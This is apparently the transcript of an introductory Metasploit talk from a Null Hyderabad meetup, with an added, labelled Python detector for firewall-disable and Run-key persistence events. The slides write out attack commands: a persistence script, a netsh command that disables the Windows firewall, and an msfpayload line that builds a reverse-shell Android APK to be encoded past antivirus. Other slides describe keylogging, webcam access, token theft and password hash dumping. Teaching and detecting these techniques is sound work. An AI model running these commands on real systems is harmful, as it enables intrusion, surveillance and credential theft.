



Null Hyd December Meet

Published in: Education


  1. INTRODUCTION TO METASPLOIT #METASPLOIT. G. Manideep, @mani0x00 - God of Frameworks
  2. #whoami

     <?php
     // Whoever you are, the answer is the same.
     $var = "@mani0x00";
     if ($var == "script kiddie") {
         echo "security flows in blood";
     } elseif ($var == "white hat") {
         echo "security flows in blood";
     } else {
         echo "security flows in blood";
     }
     ?>

     G. Manideep, 3rd year, E.C.E, @mani0x00
  3. #Creator: Developer of the Metasploit Framework. Chief Researcher at Boston. Leading provider of security data and analytics software and cloud solutions.
  4. #History: In Oct 2003 at DEFCON, Metasploit 1.0 was released with 11 exploits by H. D. Moore. It was first coded entirely in Perl and later completely re-coded in Ruby. Acquired by Rapid7 in 2009 under some terms and conditions. Remains open source.
  5. #Getting started #Vulnerability: A vulnerability is a weakness of a system which allows an attacker to exploit the system.
  6. #Getting started #Exploit: An exploit is an attack on a system, especially one that takes advantage of a particular vulnerability of the system, using payloads.
  7. #Getting started #Payload: A payload is a piece of code that executes on the vulnerable system after exploitation of the system.
  8. #Architecture
     - Libraries: Rex, MSF core, MSF base
     - Interfaces: Console, CLI, Web, Armitage
     - Modules: Exploits, Payloads, Auxiliary, Encoders, Nops
     - Plugins
     - Tools
  9. #Libraries: Rex, msf::core, msf::base
  10. #Modules: Exploits, Payloads, Auxiliary, Encoders, Nops
  11. #Auxiliary: Typically, an exploit without a payload is called an auxiliary module. Used for scanning, fuzzing and some automated tasks. Makes use of mixins. To run, type in: run
  12. #Encoders: Encoders are used to evade anti-viruses. Payloads are encrypted. E.g. shikata_ga_nai, nonalpha, bloxor
  13. #Nops: Mainly used to keep the size of the payload consistent. There are 8 NOP modules.
  14. #Interfaces: msfcli, msfconsole, msfweb, Armitage (GUI)
  15. #Armitage (GUI): Developed by Raphael Mudge
  16. #msfconsole: An interactive console. Starting msfconsole.
  17. #msfconsole: Here our journey begins: msf >
  18. #Let's attack
  19. #Port scanning: Used for information gathering. Nmap is used for port scanning; auxiliary modules can also be used. As information gathering is important in pen testing, let's do a traditional scan.
  20. #Port scanning using auxiliary modules:
  21. #Port scanning using Nmap:
  22. #Exploitation: Mostly an attacker sends a combination of exploit and payload. In msfconsole there are some simple commands that make our work pretty easy; some of them (core commands) are: search, use, set
  23. #Exploitation, using an exploit: Just type in "use <path of suggested exploit>". Prefer the exploit which has a good ranking.
  24. #Exploitation, setting parameters: Just type "show options" and find the parameters to be filled. Then set each parameter by typing "set <parameter> <value>".
  25. #Exploitation: Similar to the exploit search, search for an appropriate payload. Then set it using "set PAYLOAD" and fill in the payload parameters. Then just type in "exploit".
  26. #Some successful exploits: ms03_026_dcom, ms08_067_netapi (evergreen :D), ms11_050_mshtml, ms10_042_helpctr_xss_cmd_exec, ms10_046_shortcut_icon_dllloader, dreamftp_format, distcc_exec (for Linux)
  27. #Maintaining access: By executing a script with some arguments as shown below: run persistence -S (admin priv) -i (time interval) -p (rport) -r (lhost)
  28. #Maintaining access: By listening on the specified port using the multi/handler exploit.
  29. #Post Exploitation: Using meterpreter we can perform different tasks with the privileges of the victim. We can grab screenshots, do keylogging and much more by loading extensions such as: Espia, Incognito, Pivot, Sniffer, Priv
  30. #Post Exploitation: Can also be performed using modules. Let's take multiple screenshots at certain intervals.
  31. #Post Exploitation: Migrates to another process which has admin privileges and then completes the task.
  32. #Post Exploitation: What else can we do in post exploitation? Let's see some of them: keylogging, screenshots, view live screen, access webcam, take control of keyboard and mouse, delete user, pivot, VM detection and many more.
  33. #Privilege Escalation: Obtaining system privileges that are meant to be protected is called privilege escalation. Some methods are migrating the process and stealing tokens to get the desired privileges. Let's take a look at some of them.
  34. #Privilege Escalation: Can migrate to PIDs which have admin privileges.
  35. #Privilege Escalation: By loading Incognito, we can steal (impersonate) tokens to get privileges.
  36. #Privilege Escalation: To use, type in: impersonate_token <token>
  37. #Privilege Escalation #HashDump: Dumps all users' usernames and passwords.
  38. #What else can we do? We can even sniff the victim's packets remotely. Evading firewalls: let's take a look.
  39. #Bypassing Firewall
  40. #Bypassing Firewall: After getting a meterpreter session, get access to a shell and type: netsh firewall show opmode
  41. #Bypassing Firewall: Now type: netsh firewall set opmode mode=DISABLE
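The persistence script on slide 27 and the netsh firewall change on slides 40 and 41 both leave host telemetry behind, which is what a blue team hunts for. The following detector is an added example and is not part of the deck; it runs three rules over constructed, Sysmon-style key=value event lines embedded in the script. It assumes (as the persistence script is commonly described) that the script drops a VBScript in the user's temp directory and registers it under a Run key; the event format, field names and sample values are all constructed for the example. The firewall rule covers both the legacy "netsh firewall set opmode mode=DISABLE" form used on the slides and the newer "netsh advfirewall ... state off" form, which goes beyond the deck.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry), written in a simplified key=value
# shape loosely modelled on Sysmon process-creation (EventID 1) and registry
# value-set (EventID 13) records.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\netsh.exe CommandLine="netsh firewall show opmode" User=LAB\alice ParentImage=C:\Windows\System32\cmd.exe',
    r'EventID=1 Image=C:\Windows\System32\netsh.exe CommandLine="netsh firewall set opmode mode=DISABLE" User=LAB\alice ParentImage=C:\Windows\System32\cmd.exe',
    r'EventID=1 Image=C:\Windows\System32\netsh.exe CommandLine="netsh advfirewall set allprofiles state off" User=LAB\alice ParentImage=C:\Windows\System32\cmd.exe',
    r'EventID=13 Image=C:\Windows\System32\cmd.exe TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\XyZabc Details=C:\Users\alice\AppData\Local\Temp\QwErTy.vbs',
    r'EventID=1 Image=C:\Windows\System32\wscript.exe CommandLine="wscript.exe C:\Users\alice\AppData\Local\Temp\QwErTy.vbs" User=LAB\alice ParentImage=C:\Windows\explorer.exe',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\alice\notes.txt" User=LAB\alice ParentImage=C:\Windows\explorer.exe',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Legacy "netsh firewall" syntax (as on the slides) and the newer advfirewall form.
# "netsh firewall show opmode" is read-only and deliberately not matched.
FIREWALL_OFF_RE = re.compile(
    r"netsh\s+(?:firewall\s+set\s+opmode\s+mode\s*=\s*disable"
    r"|advfirewall\s+set\s+\w+\s+state\s+off)", re.I)
# Autostart registry locations: ...\CurrentVersion\Run\<value> or RunOnce.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
# A script dropped in a Temp directory (assumed artifact of the persistence script).
TEMP_SCRIPT_RE = re.compile(r"\\Temp\\[^\\\s\"]+\.(?:vbs|bat|ps1)\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


@dataclass
class Alert:
    rule: str
    line_no: int
    evidence: str


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values keep their spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def check_event(ev: dict) -> list:
    """Apply the three rules to one parsed event; return (rule, evidence) pairs."""
    hits = []
    cmd = ev.get("CommandLine", "")
    image = ev.get("Image", "").lower()
    # Rule 1: host firewall switched off from the command line (slides 40/41).
    if ev.get("EventID") == "1" and FIREWALL_OFF_RE.search(cmd):
        hits.append(("firewall_disabled", cmd))
    # Rule 2: a Run/RunOnce value pointing at a script in Temp (slide 27 artifact).
    if (ev.get("EventID") == "13" and RUN_KEY_RE.search(ev.get("TargetObject", ""))
            and TEMP_SCRIPT_RE.search(ev.get("Details", ""))):
        hits.append(("run_key_temp_script", ev["Details"]))
    # Rule 3: a script host executing a script out of Temp (the persisted payload running).
    if ev.get("EventID") == "1" and image.endswith(SCRIPT_HOSTS) and TEMP_SCRIPT_RE.search(cmd):
        hits.append(("script_host_temp_script", cmd))
    return hits


def detect(lines) -> list:
    """Run every rule over every line; line numbers are 1-based for the analyst."""
    alerts = []
    for n, line in enumerate(lines, 1):
        for rule, evidence in check_event(parse_event(line)):
            alerts.append(Alert(rule, n, evidence))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"line {a.line_no}: {a.rule}: {a.evidence}")
```

On the constructed input the read-only "show opmode" query and the notepad launch produce nothing, while the two firewall-off commands, the Run-key write and the wscript launch each raise one alert. In a real deployment the same three rules map onto Sysmon EventID 1 and 13 (or the equivalent EDR events), and the Run-key rule is worth extending to services and scheduled tasks, since the persistence script can also install itself as a service.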
  42. #Attacking Linux: Using distcc_exec
  43. #Attacking Android using msfpayload: msfpayload android/meterpreter/reverse_tcp LHOST=<loc-ip> LPORT=<any> R > /(desired path for saving)/<file>.apk. Install that apk file on the device; if there is any anti-virus, encode it with encoders.
  44. #Attacking Android: Listen on the mentioned port using the multi/handler exploit.
  45. #Thank you! - @mani0x0